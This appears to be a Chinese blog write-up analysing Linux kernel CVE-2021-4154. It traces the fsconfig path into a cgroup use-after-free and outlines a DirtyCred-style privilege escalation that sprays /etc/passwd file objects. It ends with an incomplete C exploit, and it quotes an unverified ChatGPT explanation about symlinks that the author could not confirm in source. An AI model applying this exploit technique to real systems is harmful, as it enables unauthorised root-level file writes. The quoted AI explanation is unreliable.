[CVE] cgroup CVE-2021-4154漏洞分析

🥲

CVE-2021-4154漏洞分析

简述

kernel/cgroup/cgroup-v1.c 的 cgroup1_parse_param()函数存在类型混淆，导致UAF漏洞。可以调用syscall fsconfig 设置任意的 fd，最终关闭该文件后 fd 对应 file 对象会被释放。通过对该漏洞的利用可能会造成本地提权的后果

影响版本: linux kernel < 5.10

漏洞分析

调用链溯源

选用源码版本v5.11 从漏洞文档得知漏洞存在于kernel/cgroup/cgroup-v1.c的cgroup1_parse_param()中首要问题就是查清调用链溯源回源头到底是谁调用的函数当然第一步还是找到目标函数

现在先不忙分析毕竟所有的参数什么的都不清楚包括分支如何流向都不清楚还是要先溯源回顶层函数这个时候vscode已经承担不住查找引用的功能了使用源码在线网站进行分析可以看到cgroup1_parse_param只被引用到了kernel/cgroup/cgroup.c中

可以看到在cgroup.c中定义了一个类似file_operations函数表的结构cgroup1_fs_context_ops 其中的.prase_param引用了cgroup1_parse_param

那么继续追.parse_param 乍一看有27个引用但是细细筛查一下发现其实没有那么多以arch/*/inode.c开头的是关于不同架构的inode.c只需要看一个即可 fs/*/super.c同理是不同文件格式的super.c只需要看一个即可以此类推可以省略大部分引用不看

经过查看大部分引用是如同/mm/shmem.c中一样只是重定义fs_context_operations这个结构体然后定义对应情况的函数表

真正关键的位置在/fs/fs_context.c中可以看到在146行的位置有一个调用是fc->ops->parse_param() 其中fc是参数且结构为fs_context这个结构比较熟悉了可以看到其ops属性就是fs_context_operations结构体那么cgroup1_fs_context_ops便是在此处vsf_parse_fs_param调用

继续查看vsf_parse_fs_param的引用有三个需要一一排查但是有一个注意点就是利用漏洞肯定需要参数是可控的参数不可控的路径就一定不是我们寻找的调用链

首先来看fs/fs_context.c 其中161行是vsf_parse_fs_param本身导出函数的痕迹而184行的调用看到传递的参数param是vfs_parse_fs_string函数内部定义的外部不可控故排除此路径

然后来看/fs/nfs/nfs4super.c 188行很明显此处调用传递的param也是函数内部定义的排除此路径

那么只剩一条路径了fs/fsopen.c 这次就更明显了在调用vfs_parse_fs_param时传递进函数的param正是调用vfs_fsconfig_locked的参数param 那么确定vfs_parse_fs_param的上层路径为vfs_fsconfig_locked

继续上追这次只有一个引用且包含在系统调用fsconfig中很明显系统调用已经为最上层函数了即使有再上层的函数也无所谓了因为我们完全可以以此系统调用为切入点来控制程序流而不必寻找更上层的函数

至此函数调用链就明晰了为fsconfig() -> vfs_fsconfig_locked() -> vfs_parse_fs_param() -> cgroup1_parse_param() 接下来转入静态分析的工作

静态分析

函数调用链溯源是从下往上看的话那么静态分析就是从上往下分析了

首先来看fsconfig系统调用 在函数内部大量调用了结构体之前基本都分析过这里不再分析结构体直接给出定义方便查看其实经过阅读源码可以发现在系统调用内部并没有执行什么操作主要是针对不同的cmd值进行参数配置最终将配置好的参数param传入vfs_fsconfig_locked 此处函数没有分流看看就好

c
// include/linux/fs_context.h
struct fs_context {
	const struct fs_context_operations *ops;
	struct mutex		uapi_mutex;	/* Userspace access mutex */
	struct file_system_type	*fs_type;
	void			*fs_private;	/* The filesystem's context */
	void			*sget_key;
	struct dentry		*root;		/* The root and superblock */
	struct user_namespace	*user_ns;	/* The user namespace for this mount */
	struct net		*net_ns;	/* The network namespace for this mount */
	const struct cred	*cred;		/* The mounter's credentials */
	struct p_log		log;		/* Logging buffer */
	const char		*source;	/* The source name (eg. dev path) */
	void			*security;	/* Linux S&M options */
	void			*s_fs_info;	/* Proposed s_fs_info */
	unsigned int		sb_flags;	/* Proposed superblock flags (SB_*) */
	unsigned int		sb_flags_mask;	/* Superblock flags that were changed */
	unsigned int		s_iflags;	/* OR'd with sb->s_iflags */
	unsigned int		lsm_flags;	/* Information flags from the fs to the LSM */
	enum fs_context_purpose	purpose:8;
	enum fs_context_phase	phase:8;	/* The phase the context is in */
	bool			need_free:1;	/* Need to call ops->free() */
	bool			global:1;	/* Goes into &init_user_ns */
	bool			oldapi:1;	/* Coming from mount(2) */
};

c
// include/linux/file.h
struct fd {
	struct file *file;
	unsigned int flags;
};

c
// fs/fsopen.c
// fsconfig_set_flag: 未指定值。参数必须是布尔型的。键可以以"no"为前缀来反转设置。"_value"必须为空，而"aux"必须为0。
// fsconfig_set_string: 指定了字符串值。参数可以期望布尔型、整型、字符串或采用路径。将尝试转换为适当的类型（其中可能包括查找路径）。"_value"指向以NUL结尾的字符串，而"aux"必须为0。
// fsconfig_set_binary: 指定了二进制块。"_value"指向该块，而"aux"表示其大小。参数必须期望一个二进制块。
// fsconfig_set_path: 指定了一个非空路径。参数必须期望一个路径对象。"_value"指向以NUL结尾的字符串，该字符串是路径，而"aux"是一个文件描述符，用于启动相对查找或使用AT_FDCWD。
// fsconfig_set_path_empty: 与fsconfig_set_path函数类似，但隐含了AT_EMPTY_PATH。
// fsconfig_set_fd: 指定了一个打开的文件描述符。"_value"必须为NULL，而"aux"指示文件描述符的值。

SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	struct fs_context *fc;
	struct fd f;
	int ret;
	int lookup_flags = 0;

	struct fs_parameter param = {
		.type	= fs_value_is_undefined,
	};

	if (fd < 0)
		return -EINVAL;
  
	// 数据合法性校验
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	case FSCONFIG_SET_STRING:
		if (!_key || !_value || aux)
			return -EINVAL;
		break;
	...
	}

	f = fdget(fd); // 获取fd结构体
	if (!f.file)
		return -EBADF;
	ret = -EINVAL;
	if (f.file->f_op != &fscontext_fops)
		goto out_f;

	fc = f.file->private_data; // file结构体的private_date属性内存放file_context结构体
	// 合法性校验
  if (fc->ops == &legacy_fs_context_ops) {
		switch (cmd) {
		case FSCONFIG_SET_BINARY:
		case FSCONFIG_SET_PATH:
		case FSCONFIG_SET_PATH_EMPTY:
		case FSCONFIG_SET_FD:
			ret = -EOPNOTSUPP;
			goto out_f;
		}
	}

	if (_key) {
		param.key = strndup_user(_key, 256);
		if (IS_ERR(param.key)) {
			ret = PTR_ERR(param.key);
			goto out_f;
		}
	}
	
  // 根据参数cmd设置一会传递进vfs_fsconfig_locked的参数param
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		param.type = fs_value_is_flag;
		break;
	case FSCONFIG_SET_STRING:
		param.type = fs_value_is_string;
		param.string = strndup_user(_value, 256);
		if (IS_ERR(param.string)) {
			ret = PTR_ERR(param.string);
			goto out_key;
		}
		param.size = strlen(param.string);
		break;
	...
	case FSCONFIG_SET_FD:
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux); 
		if (!param.file)
			goto out_key;
		break;
	default:
		break;
	}

	ret = mutex_lock_interruptible(&fc->uapi_mutex);
	if (ret == 0) {
		ret = vfs_fsconfig_locked(fc, cmd, &param);
		mutex_unlock(&fc->uapi_mutex);
	}

	/* Clean up the our record of any value that we obtained from
	 * userspace.  Note that the value may have been stolen by the LSM or
	 * filesystem, in which case the value pointer will have been cleared.
	 */
	switch (cmd) {
	case FSCONFIG_SET_STRING:
	case FSCONFIG_SET_BINARY:
		kfree(param.string);
		break;
	case FSCONFIG_SET_PATH:
	case FSCONFIG_SET_PATH_EMPTY:
		if (param.name)
			putname(param.name);
		break;
	case FSCONFIG_SET_FD:
		if (param.file)
			fput(param.file);
		break;
	default:
		break
	}
out_key:
	kfree(param.key);
out_f:
	fdput(f);
	return ret;
}

接下来进入vfs_fsconfig_locked 可以看到函数内部根据参数cmd和fc->phase来进行分流我们的目的是让程序流向vfs_parse_fs_param所以要求cmd != FSCONFIG_CMD_CREATE && cmd != FSCONFIG_CMD_RECONFIGURE 然后是fc->phase的问题即当前上下文的阶段通过查看其定义发现有7种状态当然这些状态我们也是不可控的只做了解即可不必深究

c
/*
 * Userspace usage phase for fsopen/fspick.
 */
enum fs_context_phase {
	FS_CONTEXT_CREATE_PARAMS,	/* Loading params for sb creation */
	FS_CONTEXT_CREATING,		/* A superblock is being created */
	FS_CONTEXT_AWAITING_MOUNT,	/* Superblock created, awaiting fsmount() */
	FS_CONTEXT_AWAITING_RECONF,	/* Awaiting initialisation for reconfiguration */
	FS_CONTEXT_RECONF_PARAMS,	/* Loading params for reconfiguration */
	FS_CONTEXT_RECONFIGURING,	/* Reconfiguring the superblock */
	FS_CONTEXT_FAILED,		/* Failed to correctly transition a context */
};

c
// fs/fsopen.c
static int vfs_fsconfig_locked(struct fs_context *fc, int cmd,
			       struct fs_parameter *param)
{
	struct super_block *sb;
	int ret;

	ret = finish_clean_context(fc);
	if (ret)
		return ret;
	switch (cmd) {
	case FSCONFIG_CMD_CREATE:
		...
		return 0;
	case FSCONFIG_CMD_RECONFIGURE:
		...
		vfs_clean_context(fc);
		return 0;
	default:
		if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
		    fc->phase != FS_CONTEXT_RECONF_PARAMS)
			return -EBUSY;

		return vfs_parse_fs_param(fc, param);
	}
	fc->phase = FS_CONTEXT_FAILED;
	return ret;
}

跟进vfs_parse_fs_param 这里也是没什么要求只要求param->key不为空

c
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
	int ret;

	if (!param->key) // 要求param->key不为空
		return invalf(fc, "Unnamed parameter\n");

	ret = vfs_parse_sb_flag(fc, param->key);
	if (ret != -ENOPARAM)
		return ret;

	ret = security_fs_context_parse_param(fc, param);
	if (ret != -ENOPARAM)
		/* Param belongs to the LSM or is disallowed by the LSM; so
		 * don't pass to the FS.
		 */
		return ret;

	if (fc->ops->parse_param) {
		ret = fc->ops->parse_param(fc, param);
		if (ret != -ENOPARAM)
			return ret;
	}

	/* If the filesystem doesn't take any arguments, give it the
	 * default handling of source.
	 */
	if (strcmp(param->key, "source") == 0) {
		if (param->type != fs_value_is_string)
			return invalf(fc, "VFS: Non-string source");
		if (fc->source)
			return invalf(fc, "VFS: Multiple sources");
		fc->source = param->string;
		param->string = NULL;
		return 0;
	}

	return invalf(fc, "%s: Unknown parameter '%s'",
		      fc->fs_type->name, param->key);
}

而param->key的设置是在最开始的fsconfig系统调用内很显然如果param->key不为空要求参数_key不为空即可 strndup_user按照函数名理解是和用户空间的strndup一个效果即字符串复制

c
SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	...
	if (fd < 0)
		return -EINVAL;

	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	...
	default:
		return -EOPNOTSUPP;
	}

	...

	if (_key) {
		param.key = strndup_user(_key, 256);
		if (IS_ERR(param.key)) {
			ret = PTR_ERR(param.key);
			goto out_f;
		}
	}
	...

跟进最终函数cgroup1_parse_param 其实漏洞也很明显就是党param->key == "source"时此时会直接将param->string赋值给fc->source 但是却没有对param->type进行校验

c
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
	struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
	struct cgroup_subsys *ss;
	struct fs_parse_result result;
	int opt, i;

	opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
	if (opt == -ENOPARAM) {
		if (strcmp(param->key, "source") == 0) {
			if (fc->source)
				return invalf(fc, "Multiple sources not supported");
			fc->source = param->string;
			param->string = NULL;
			return 0;
		}
		...
	}
	return 0;
}

回到最开始的系统调用处我们看看param->type有什么作用可以看到根据不同的cmd值对pram.type赋不同的值很明显cgroup1_parse_param的处理应当是针对param.type == fs_value_is_flag因为只有在这种情况下param.string才有值嘛

c
...
switch (cmd) {
	case FSCONFIG_SET_FLAG:
		param.type = fs_value_is_flag;
		break;
	case FSCONFIG_SET_STRING:
		param.type = fs_value_is_string;
		param.string = strndup_user(_value, 256);
		if (IS_ERR(param.string)) {
			ret = PTR_ERR(param.string);
			goto out_key;
		}
		param.size = strlen(param.string);
		break;
	case FSCONFIG_SET_BINARY:
		param.type = fs_value_is_blob;
		param.size = aux;
		param.blob = memdup_user_nul(_value, aux);
		if (IS_ERR(param.blob)) {
			ret = PTR_ERR(param.blob);
			goto out_key;
		}
		break;
	case FSCONFIG_SET_PATH_EMPTY:
		lookup_flags = LOOKUP_EMPTY;
		fallthrough;
	case FSCONFIG_SET_PATH:
		param.type = fs_value_is_filename;
		param.name = getname_flags(_value, lookup_flags, NULL);
		if (IS_ERR(param.name)) {
			ret = PTR_ERR(param.name);
			goto out_key;
		}
		param.dirfd = aux;
		param.size = strlen(param.name->name);
		break;
	case FSCONFIG_SET_FD:
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux);
		if (!param.file)
			goto out_key;
		break;
	default:
		break;
	}
...

但是如果看一看param结构的定义也即fs_parameter会发现对于string blob name file是一个联合类型也很合理毕竟按理来说一个param只有一个类型也只能使用这四个属性中的一个所以组成联合类型也没错但是关键点在于如果我们的param.type是fs_value_is_file呢?

c
struct fs_parameter {
	const char		*key;		/* Parameter name */
	enum fs_value_type	type:8;		/* The type of value here */
	union {
		char		*string;
		void		*blob;
		struct filename	*name;
		struct file	*file;
	};
	size_t	size;
	int	dirfd;
};

根据fsconfig中的源码如果cmd == FSCONFIG_SET_FD那么在param.file处存放的是aux的file结构体而param.file和param.string的偏移是相同的也就是系统不根据param.type的话根本分不清到底数据是param.string还是param.file

c
case FSCONFIG_SET_FD:
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux);
		if (!param.file)
			goto out_key;
		break;

那么等到了cgroup1_parse_param处时就会有大问题

c
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
	struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
	struct cgroup_subsys *ss;
	struct fs_parse_result result;
	int opt, i;

	opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
	if (opt == -ENOPARAM) {
		if (strcmp(param->key, "source") == 0) {
			if (fc->source)
				return invalf(fc, "Multiple sources not supported");
			fc->source = param->string;
			param->string = NULL;
			return 0;
		}
		...
	}
	return 0;
}

这里的fc->string = param->string会直接将aux的File结构体赋值到第一个fs_context的source属性中也即将aux的File结构体存放到了fd的fs_contex中那如果等到释放fd的时候如果调用了free(fc.source)的话就会造成UAF漏洞

close分析

那么就是接下来看看关闭文件描述符fd的时候会不会造成UAF了众所周知close()其实是系统调用sys_close 很明显调用了close_fd()

c
// fs/open.c
SYSCALL_DEFINE1(close, unsigned int, fd)
{
	int retval = close_fd(fd);

	/* can't restart close syscall because file table entry was cleared */
	if (unlikely(retval == -ERESTARTSYS ||
		     retval == -ERESTARTNOINTR ||
		     retval == -ERESTARTNOHAND ||
		     retval == -ERESTART_RESTARTBLOCK))
		retval = -EINTR;

	return retval;
}

c
// fs/file.c
int close_fd(unsigned fd)
{
	struct files_struct *files = current->files;
	struct file *file;

	file = pick_file(files, fd);
	if (!file)
		return -EBADF;

	return filp_close(file, files);
}

c
// fs/open.c
int filp_close(struct file *filp, fl_owner_t id)
{
	int retval = 0;

	if (!file_count(filp)) {
		printk(KERN_ERR "VFS: Close: file count is 0\n");
		return 0;
	}

	if (filp->f_op->flush)
		retval = filp->f_op->flush(filp, id);

	if (likely(!(filp->f_mode & FMODE_PATH))) {
		dnotify_flush(filp, id);
		locks_remove_posix(filp, id);
	}
	fput(filp);
	return retval;
}

c
// fs/file_table.c
void fput(struct file *file)
{
	fput_many(file, 1);
}

c
// fs/file_table.c
void fput_many(struct file *file, unsigned int refs)
{
	if (atomic_long_sub_and_test(refs, &file->f_count)) {
		struct task_struct *task = current;

		if (likely(!in_interrupt() && !(task->flags & PF_KTHREAD))) {
			init_task_work(&file->f_u.fu_rcuhead, ____fput); 
			if (!task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)) // 简单理解就是新开线程执行____fput
				return;
			/*
			 * After this task has run exit_task_work(),
			 * task_work_add() will fail.  Fall through to delayed
			 * fput to avoid leaking *file.
			 */
		}

		if (llist_add(&file->f_u.fu_llist, &delayed_fput_list))
			schedule_delayed_work(&delayed_fput_work, 1);
	}
}

c
// fs/file_table.c
static void ____fput(struct callback_head *work)
{
	__fput(container_of(work, struct file, f_u.fu_rcuhead));
}

c
// fs/file_table.c
static void __fput(struct file *file)
{
	struct dentry *dentry = file->f_path.dentry;
	struct vfsmount *mnt = file->f_path.mnt;
	struct inode *inode = file->f_inode;
	fmode_t mode = file->f_mode;

	...
	if (unlikely(file->f_flags & FASYNC)) {
		if (file->f_op->fasync)
			file->f_op->fasync(-1, file, 0);
	}
	if (file->f_op->release)
		file->f_op->release(inode, file);
	...
}

卧槽终于找到了close的整体调用链是close() -> sys_close() -> close_fd() -> filp_close() -> fput() -> fput_many() -> ____fput() -> __fput -> file.f_op.release

那么回到主题fsconfig中在fsconfig源码中有一句f.file->f_op != &fscontext_fops 也就是强制限制了file.f_op == &fscontext_fops

c
SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	struct fs_context *fc;
	struct fd f;
	int ret;
	int lookup_flags = 0;
	...
	if (fd < 0)
		return -EINVAL;
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	...
	default:
		return -EOPNOTSUPP;
	}

	f = fdget(fd);
	if (!f.file)
		return -EBADF;
	ret = -EINVAL;
	if (f.file->f_op != &fscontext_fops)
		goto out_f;
out_f:
	fdput(f);
	return ret;
}

而fscontext_fops中的release为函数fscontext_release

c
// fs/fsopen.c
const struct file_operations fscontext_fops = {
	.read		= fscontext_read,
	.release	= fscontext_release,
	.llseek		= no_llseek,
};

c
static int fscontext_release(struct inode *inode, struct file *file)
{
	struct fs_context *fc = file->private_data;

	if (fc) {
		file->private_data = NULL;
		put_fs_context(fc);
	}
	return 0;
}

可以看到最后倒数第二行调用了kfree(fc->source) 证明UAF漏洞存在

c
void put_fs_context(struct fs_context *fc)
{
	struct super_block *sb;

	if (fc->root) {
		sb = fc->root->d_sb;
		dput(fc->root);
		fc->root = NULL;
		deactivate_super(sb);
	}

	if (fc->need_free && fc->ops && fc->ops->free)
		fc->ops->free(fc);

	security_free_mnt_opts(&fc->security);
	put_net(fc->net_ns);
	put_user_ns(fc->user_ns);
	put_cred(fc->cred);
	put_fc_log(fc);
	put_filesystem(fc->fs_type);
	kfree(fc->source);
	kfree(fc);
}

漏洞利用

上面漏洞分析很复杂但是利用起来思路相当的直接造成了UAF之后虽然file1的File结构体被释放但是其指针仍然指向当前位置那么如果在此时喷射大量高权限的File结构体的话就有可能对其进行写入这也就是上篇文章DirtyCred: Escalating Privilege in Linux Kernel的思想

按照DirtyCred第5节所说在kernel v4.13之前对文件进行写入的流程是 鉴权 -> 从用户空间读取数据 -> 写入文件 中间这从用户空间读取数据这一步能玩的花样可太多了可以利用FUZE或者userfaultfd暂停执行放到当前漏洞中就是 file1开始写入动作(file1的File结构体被释放过了) -> 鉴权通过(写自己的文件肯定通过) -> 从用户空间读取数据 -> 被暂停执行 -> 喷射只读文件file2 -> file2的File结构体覆盖到原file1的File结构体处 -> 恢复执行 -> file1写入到file2中 这样就完成了一次越权写入

但是很可惜在kernel v4.13之后对于文件写入的流程就变了修改为从用户空间读取数据 -> 鉴权 -> 写入文件 这样就修复了之前暂停执行的利用手法并且在kernel v5.11之后就禁止了用户态使用userfaultfd

所以按照DirtyCred的思想可以利用文件系统的特性(甚至都不算BUG)来实现和之前一样的效果那就是锁

这里就拿我们最熟悉的老朋友ext4来说可以从其函数表看出写入文件时使用的函数是ext4_file_write_iter

c
// fs/ext4/file.c
const struct file_operations ext4_file_operations = {
	.llseek		= ext4_llseek,
	.read_iter	= ext4_file_read_iter,
	.write_iter	= ext4_file_write_iter,
	.iopoll		= iomap_dio_iopoll,
	.unlocked_ioctl = ext4_ioctl,
#ifdef CONFIG_COMPAT
	.compat_ioctl	= ext4_compat_ioctl,
#endif
	.mmap		= ext4_file_mmap,
	.mmap_supported_flags = MAP_SYNC,
	.open		= ext4_file_open,
	.release	= ext4_release_file,
	.fsync		= ext4_sync_file,
	.get_unmapped_area = thp_get_unmapped_area,
	.splice_read	= generic_file_splice_read,
	.splice_write	= iter_file_splice_write,
	.fallocate	= ext4_fallocate,
};

如果我们只是正常的文件写的话很明显在ext4_file_write_iter内调用的是ext4_buffered_write_iter

c
static ssize_t
ext4_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
{
	struct inode *inode = file_inode(iocb->ki_filp);

	if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
		return -EIO;

#ifdef CONFIG_FS_DAX
	if (IS_DAX(inode))
		return ext4_dax_write_iter(iocb, from);
#endif
	if (iocb->ki_flags & IOCB_DIRECT)
		return ext4_dio_write_iter(iocb, from);
	else
		return ext4_buffered_write_iter(iocb, from);
}

很明显在调用真正写入函数generic_perform_write之前有一个inode_lock(inode)的操作实际上通过操作系统的知识可以得知这是一个很正常的操作毕竟为了保证写入数据的稳定肯定不能让多个进程同时写一个文件那么这个等待锁的操作其实也是变相实现了停止执行的操作根据DirtyCred描述如果需要写入4G的数据即可等待数十秒足够进行喷射了

c
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
					struct iov_iter *from)
{
	ssize_t ret;
	struct inode *inode = file_inode(iocb->ki_filp);

	if (iocb->ki_flags & IOCB_NOWAIT)
		return -EOPNOTSUPP;

	ext4_fc_start_update(inode);
	inode_lock(inode);
	ret = ext4_write_checks(iocb, from);
	if (ret <= 0)
		goto out;

	current->backing_dev_info = inode_to_bdi(inode);
	ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos);
	current->backing_dev_info = NULL;

out:
	inode_unlock(inode);
	ext4_fc_stop_update(inode);
	if (likely(ret > 0)) {
		iocb->ki_pos += ret;
		ret = generic_write_sync(iocb, ret);
	}

	return ret;
}

那么目前的利用思路就是设置三个线程Thread1 Thread2 Thread3 其中Thread1正常打开一个可写文件往其内部写入大量数据 Thread2打开和Thread1一样的文件往其内部写入恶意语句 但是由于Thread1占用了锁所以需要等待 Thread3利用漏洞kfree掉Thread2的File结构体然后大量喷射/etc/passwd结构体使其覆盖Thread2的结构体然后等待Thread1释放锁因为Thread2在等待锁之前已经完成鉴权所以在获得锁之后就会直接写入造成越权写

但是这里有一个细节问题在进入到各个文件类型真正的写函数之前统一的调用入口肯定是系统调用write

c
// fs/read_write.c
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	return ksys_write(fd, buf, count);
}

坏就坏在这个fdget_pos函数上了

c
// fs/read_write.c
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos, *ppos = file_ppos(f.file);
		if (ppos) {
			pos = *ppos;
			ppos = &pos;
		}
		ret = vfs_write(f.file, buf, count, ppos);
		if (ret >= 0 && ppos)
			f.file->f_pos = pos;
		fdput_pos(f);
	}

	return ret;
}

c
// include/linux/file.h
static inline struct fd fdget_pos(int fd)
{
	return __to_fd(__fdget_pos(fd));
}

可以看到在fdget_pos内还有一个锁如果file->f_mode==FMODE_ATOMIC_POS且对于文件的引用数大于1的话那么进程之间会竞争file->f_pos_lock锁但是此时还没到鉴权这一步呢!

c
unsigned long __fdget_pos(unsigned int fd)
{
	unsigned long v = __fdget(fd);
	struct file *file = (struct file *)(v & ~3);

	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
		if (file_count(file) > 1) {
			v |= FDPUT_POS_UNLOCK;
			mutex_lock(&file->f_pos_lock);
		}
	}
	return v;
}

鉴权操作是在vfs_write中

c
// fs/read_write.c
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos, *ppos = file_ppos(f.file);
		if (ppos) {
			pos = *ppos;
			ppos = &pos;
		}
		ret = vfs_write(f.file, buf, count, ppos);
		if (ret >= 0 && ppos)
			f.file->f_pos = pos;
		fdput_pos(f);
	}

	return ret;
}

c
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
	ssize_t ret;

	if (!(file->f_mode & FMODE_WRITE))
		return -EBADF;
	if (!(file->f_mode & FMODE_CAN_WRITE))
		return -EINVAL;
	if (unlikely(!access_ok(buf, count)))
		return -EFAULT;

	ret = rw_verify_area(WRITE, file, pos, count);
	if (ret)
		return ret;
	if (count > MAX_RW_COUNT)
		count =  MAX_RW_COUNT;
	file_start_write(file);
	if (file->f_op->write)
		ret = file->f_op->write(file, buf, count, pos);
	else if (file->f_op->write_iter)
		ret = new_sync_write(file, buf, count, pos);
	else
		ret = -EINVAL;
	if (ret > 0) {
		fsnotify_modify(file);
		add_wchar(current, ret);
	}
	inc_syscw(current);
	file_end_write(file);
	return ret;
}

对于上面的利用思路由于Thread1和Thread2都打开了同一个文件所以该文件的引用数至少为3 而使用open的话会自动设置f->mode=FMODE_ATOMIC_POS

c
static int do_dentry_open(struct file *f,
			  struct inode *inode,
			  int (*open)(struct inode *, struct file *))
{
	static const struct file_operations empty_fops = {};
	int error;

	...
	/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
	if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
		f->f_mode |= FMODE_ATOMIC_POS;

	...
	return error;
}

这里给出的解决方法是如果打开的文件是一个软链接文件那么就不会设置FMODE_ATOMIC_POS标志但是我没有找到相关源码

ChatGPT给出的解释

这是由于 FMODE_ATOMIC_POS 标志位的含义。它的作用是用于表示文件位置相关操作是否是原子操作。也就是说，如果一个文件对象的 f_mode 字段有 FMODE_ATOMIC_POS 标志位被设置，那么对该文件对象进行位置相关操作时，内核会将其作为原子操作执行。

然而，软链接文件并没有实际的数据，它只是一个指向另一个文件或目录的符号链接。因此，它也没有实际的位置信息需要保护。在打开软链接文件时，内核会跟踪软链接所指向的目标文件，并在访问目标文件时执行相应的操作。因此，在打开软链接文件时，不需要将 FMODE_ATOMIC_POS 标志位设置到 struct file 结构体中。

总之，FMODE_ATOMIC_POS 标志位是专门用于表示一个文件对象是否支持原子操作的，而软链接文件本质上并没有数据需要保护，也没有位置信息需要保护，所以不需要使用 FMODE_ATOMIC_POS 标志位来表示软链接文件的特性。

总而言之如果方法奏效的话那么就可以尝试着开始编写EXP了

c
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/uio.h>
#include <fcntl.h>
#include <signal.h>
#include <linux/sched.h>
#include <pthread.h>
#include <linux/kcmp.h>

#define __NR_fsconfig 0x1AF
#define FSCONFIG_SET_FD 0x5
#define MAX_SPRAY_FILE_NUM 0x1000
size_t UID;
size_t GID;
int UAFfd;
int WriteFlag;
int SprayFlag;
int fds[MAX_SPRAY_FILE_NUM];

__attribute__((aligned(64 << 10))) static char SandboxStack[1 << 20];

void MakeTestEnvir()
{
    system("rm -rf test_dir; mkdir test_dir; touch test_dir/data; touch test_dir/cgroup;");
    char *TempDir = "test_dir";
    if (chmod(TempDir, 0777))
    {
        exit(-1);
    }
    if (chdir(TempDir))
    {
        exit(-1);
    }
}

void SandboxSetup()
{
    prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
    setsid();
    struct rlimit rlim;
    rlim.rlim_cur = rlim.rlim_max = (200 << 20);
    setrlimit(RLIMIT_AS, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 32 << 20;
    setrlimit(RLIMIT_MEMLOCK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 136 << 20;
    setrlimit(RLIMIT_FSIZE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 1 << 20;
    setrlimit(RLIMIT_STACK, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &rlim);
    rlim.rlim_cur = rlim.rlim_max = 256;
    setrlimit(RLIMIT_NOFILE, &rlim);
    if (unshare(CLONE_NEWNS))
    {
    }
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL))
    {
    }
    if (unshare(CLONE_NEWIPC))
    {
    }
    if (unshare(0x02000000))
    {
    }
    if (unshare(CLONE_NEWUTS))
    {
    }
    if (unshare(CLONE_SYSVSEM))
    {
    }
    typedef struct
    {
        const char *name;
        const char *value;
    } sysctl_t;
    static const sysctl_t sysctls[] = {
        {"/proc/sys/kernel/shmmax", "16777216"},
        {"/proc/sys/kernel/shmall", "536870912"},
        {"/proc/sys/kernel/shmmni", "1024"},
        {"/proc/sys/kernel/msgmax", "8192"},
        {"/proc/sys/kernel/msgmni", "1024"},
        {"/proc/sys/kernel/msgmnb", "1024"},
        {"/proc/sys/kernel/sem", "1024 1048576 500 1024"},
    };
    unsigned i;
    for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++)
        WriteFile(sysctls[i].name, sysctls[i].value);
}

void WriteFile(const char *file, const char *what, ...)
{
    char buf[1024];
    va_list args;
    va_start(args, what);
    vsnprintf(buf, sizeof(buf), what, args);
    va_end(args);
    buf[sizeof(buf) - 1] = 0;
    int len = strlen(buf);
    int fd = open(file, O_WRONLY | O_CLOEXEC);
    if (fd == -1)
        return false;
    if (write(fd, buf, len) != len)
    {
        int err = errno;
        close(fd);
        errno = err;
        return false;
    }
    close(fd);
    return true;
}

void SlowWrite()
{
    printf("Staring SlowWrite...\n");
    int fd = open("./uaf", O_WRONLY);
    int offset;
    void *mem;
    struct iovec iov[5];

    if (fd < 0)
    {
        perror("SlowWrite open uaf");
        exit(2);
    }

